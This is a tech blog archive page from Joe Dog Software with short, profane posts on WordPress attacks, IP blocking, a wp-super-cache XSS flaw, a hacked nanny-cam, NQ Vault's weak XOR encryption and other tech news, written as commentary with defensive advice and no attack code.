Fork me on Github
Fork me on Github

Joe Dog Software

Proudly serving the Internets since 1999

Block IP Addresses With, um, block

Last night we told you that ISIS assholes were attacking America and its WordPress blogs. Have no fear, kids. In the War Against Internet Dickbags, Your JoeDog is here to help. Whenever he’s attacked by these people, i.e., all the time, he grabs their IP addresses from the logs and blocks their asses. He feeds those addresses to a script called block which, um, blocks them.

The script is just a convenience which makes your life easier. iptables does the heavy lifting. If you’re running a linux system — and why aren’t you? — then you probably have iptables.

Let’s block some dickwads now! (Continued after the jump)

Continue reading Block IP Addresses With, um, block



ISIS Unleashes Its Skiddies

skiddieThe FBI released a Public Service Announcement, you guys. According to the bulletin, ISIS skiddies have started attacking WordPress installations. They’re trying to exploit known vulnerabilities in an attempt to grab your personal and financial information.

Well, tell them to join the fscking club.

This site has been attacked so many times, that we’ve applied for Veterans’ benefits. Without checking the logs, we can confidently say that some asshole’s attacking it now. Why can we confidently say that? Because some asshole’s always attacking it!

The most frequent assault is a dictionary login attack. They pound the login page with an endless stream of login attempts. Here’s how we thwarted that one.

Your best defense against against these dicks is to keep your software up-to-date. If you operate in a specific region, you could always firewall off large parts of the globe. If we blocked Asia, we’d reduce attacks by over 50%. Don’t worry, Asia. We love you. But please get your software up-to-date.



WordPress Vulnerability: wp-super-cache

spaghetti-codeWhenever someone says “PHP sucks!” Your JoeDog assumes they got that impression from WordPress. It uses inline programming tags that mix logic with content. Whenever you do that, the result is always a nice heaping mound of spaghetti code.

PHP doesn’t have to be coded this way. The there are plenty of nice frameworks which support model-view-controller. Your JoeDog uses WordPress because he likes it as a blogging platform. He blogs on this site more often than he codes it; a cost-benefit analysis leads him to WordPress.

He also opens himself to vulnerabilities. Oh, look! Here’s another one now: Persistent XSS in WP-Super-Cache. Your JoeDog uses that module. What’s wrong with it?

Using this vulnerability, an attacker using a carefully crafted query could insert malicious scripts to the plugin’s cached file listing page. As this page requires a valid nonce in order to be displayed, a successful exploitation would require the site’s administrator to have a look at that particular section, manually.

Fortunately, the fix is already out. If you’re also using wp-super-cache, make sure you’re running version 1.1.4. This is a dangerous vulnerability which is easy to exploit. Get up to date or get out of the game.

NOTE: Your JoeDog considers PHP a rather elegant language. It’s many bad implementations and design decisions that make it seem like Suck.



A Nerd Dream Becomes Reality

xrayGreg Charvat has been tinkering with things his entire life. He’s well-known in the maker community where he’s published a lot of neat hacks. In his garage he builds vacuum tube audio equipment and restores antique autos. He’s also a university professor who’s written a course on building RADAR systems. Now comes the fun part. Greg recently combined his maker skills with his scientific knowledge to make every nerd’s wet dreams a reality. He’s developed x-ray vision!!11!1!!



I, Leg Brace

exoskeletonHumans have tried to improve the physicality humans for as long as there have been humans. Our big brains often produce big ideas that our puny bodies can’t realize. We’ve made wings in failed attempts to soar. We’ve produced an endless array of footwear, body armor and extensions for our appendages to improve our physical performance. Generally these devices have failed us but sometimes — such as in the case of artificial wings — they’ve killed us.

In our quest for improved performance, physics is generally the meanie that bites our ass. In 1890, a Russian inventor patented a device to improve our ability to run, walk and jump. Unfortunately, it was too heavy and burdensome to actually enhance performance in any of those areas. “This thing sucks. Take it off.”

In 2013, a Belgian team finally produced a version of the 1890 prototype that was able to offset the burdens of its own weight and produce a net positive performance gain. That may seem like a long time but it’s only about three professional lifetimes. Now the gains keep coming.

An American team led by Steven Collins at Carnegie Mellon have developed an extremely light spring-loaded brace which boosts the performance of the calf muscles and the Achilles tendon by absorbing small amounts of energy when the foot hits the ground. The team reports a 7% performance gain.

Gregory Sawicki, one of the paper’s co-authors, put that in perspective for the Guardian. “A 7% reduction in energy cost is like taking off a 10-pound backpack, which is significant. Though it’s surprising that we were able to achieve this advantage over a system strongly shaped by evolution, this study shows that there’s still a lot to learn about human biomechanics and a seemingly simple behaviour like walking,” he said.

Not bad, humans. Not bad at all.



Zombie Bugs

From Nibble Sec we get one of those stories that makes roll our eyes. Actually, it makes us shake our heads but Your JoeDog refuses to type ‘SMH.’ Wait a second – you just typed it! Shaddup.

A four-year-old Adobe bug (CVE-2011-2461) is back from the dead. The flaw puts flash users at risk of having their sessions hijacked. But this bug was patched by Adobe back in November 2011 — why are we talking about it now?

Static libraries! If an app was compiled using the vulnerable SDK, then it still contains the vulnerable code unless it’s recompiled with a patched SDK.

Here’s how it works: Static libraries contain subroutines which are compiled into the executable. In this case, bad binary code was copied into the app. To fix the bug, you need to recompile the app so good code gets copied into it.

Really? Yes. Really.

“I have nothing to do today.” –Nobody in IT, ever.



Enter Sandman

sandmanLet’s face it. Online appliances are designed for the lowest common denominator. Consider an average person’s intelligence. Half of a manufacturer’s customers are dumber than that. If they lock-down a device too securely, they’re just setting themselves up for a lot of service calls. We all know how manufacturers feel about service calls.

Last week a Minnesota couple got a lesson in device security. One night they were lying in bed and music starting wafting into their bedroom. It appeared to come from the nursery where their infant slept. That’s odd, right? When an infant get its hands on music it’s more likely to eat the CD than put it in a player and hit “start.”

It turns out the music was coming from the Netherlands. Wait a second – you said they lived in Minnesota! Here’s what happened: The couple entered the room to investigate. The music stopped when they opened the door. Suspecting a speaker associated with their Foscam nanny-cam, they used its software to check for web sessions. They found one associated with an IP address registered in Amsterdam. Someone from that city had attached themselves to their nanny-cam and was watching them inside their house. Creepy!

This couple wasn’t alone. They discovered private interior scenes from inside homes throughout the world. “There’s at least fifteen different countries listed and it’s not just nurseries — it’s people’s living rooms, their bedrooms, their kitchens,” she told KTTC. “Every place that people think is sacred and private in their home is being accessed.”

It’s not clear how the camera was compromised. Foscam recommends your firmware be upgraded to the latest version so it could have been a bug. But they also recommend you change the default username and password so it could have been user negligence. Beyond that, they recommend placing the daemon on an alternative port and checking your logs at regular intervals. Sounds like these things were pretty insecure….

[KTTC: Nanny-cam Hacked For World To See]

[Foscam: How To Secure Your Device]

 



You Cannot Be Serious??!!

NQ Vault is an extremely popular app. It has more than 30 million users worldwide and it’s the recipient of many great reviews on Google Play. It’s a free download and pro upgrade costs $19.99.

The app is supposed to help secure your personal data. NQ’s website refers to the mechanism that protects those files as “strong encryption.” Is it? That depends. Do you consider XOR strong encryption?

XOR is a pretty common component in complex ciphers. By itself, XOR is easy to implement and requires little processing power. With a constant repeating key, it can be a quaint hack with which to hide files. As a security hacker recently discovered, this is how NQ implements its file protection.

ninjadoge24 encrypted a small png image using NQ Vault. He then examined the file in a hex editor. To his surprised it was only partially encrypted. It struck him as a substitution pattern. A thought quickly entered his head: “What if it’s just XOR? Like just fuckin’ XOR?”

To test his hunch, he entered the hex value of the unencrypted file into a hex calculator and applied XOR to it. Guess what? It matched the NQ Vault’s “encrypted” values.

Decrypting XOR is trivial. If you visit ninjadoge24’s blog, he’ll show you how to brute force your way through it.

Honestly, this should be considered a mother fscking crime. NQ claimed this app used “strong encryption” but you could bust it with all the computing power that’s generated by a hamster wheel.



Easter Not-so-nice-time

Is Big Software cracking down on programmers who insert Easter Eggs into their code?

“Are they going away? Indeed they are,” says Dr Diomidis Spinellis, a Greek computer science academic and author of The Elements of Computing Style.

“As programming becomes more corporate, more official, one cannot appear to have code that is not officially sanctioned,” he says.

Easter eggs have not undergone the same levels of scrutiny of the rest of the code, he says, and there may be vulnerabilities attached to them.

“They still happen, but they’re less likely to be little bits of code, more likely to be hidden in documentation or code comments,” adds Brendan Quinn, a software architect in London.

“Actual executable stuff hidden in code is something that people are trying to eliminate. With varied success around the industry.”

The argument goes if a manufacturer can’t stop developers from sneaking in benign undocumented features in, how can you be sure they’ve not inserted a backdoor, too.

Your JoeDog doesn’t hide Easter Eggs inside his code. It’s open source. To find them, all you’d have to do is read….

[Business Insider: Twenty-two Easter Eggs]

[BBC News: The End of the Easter Egg?]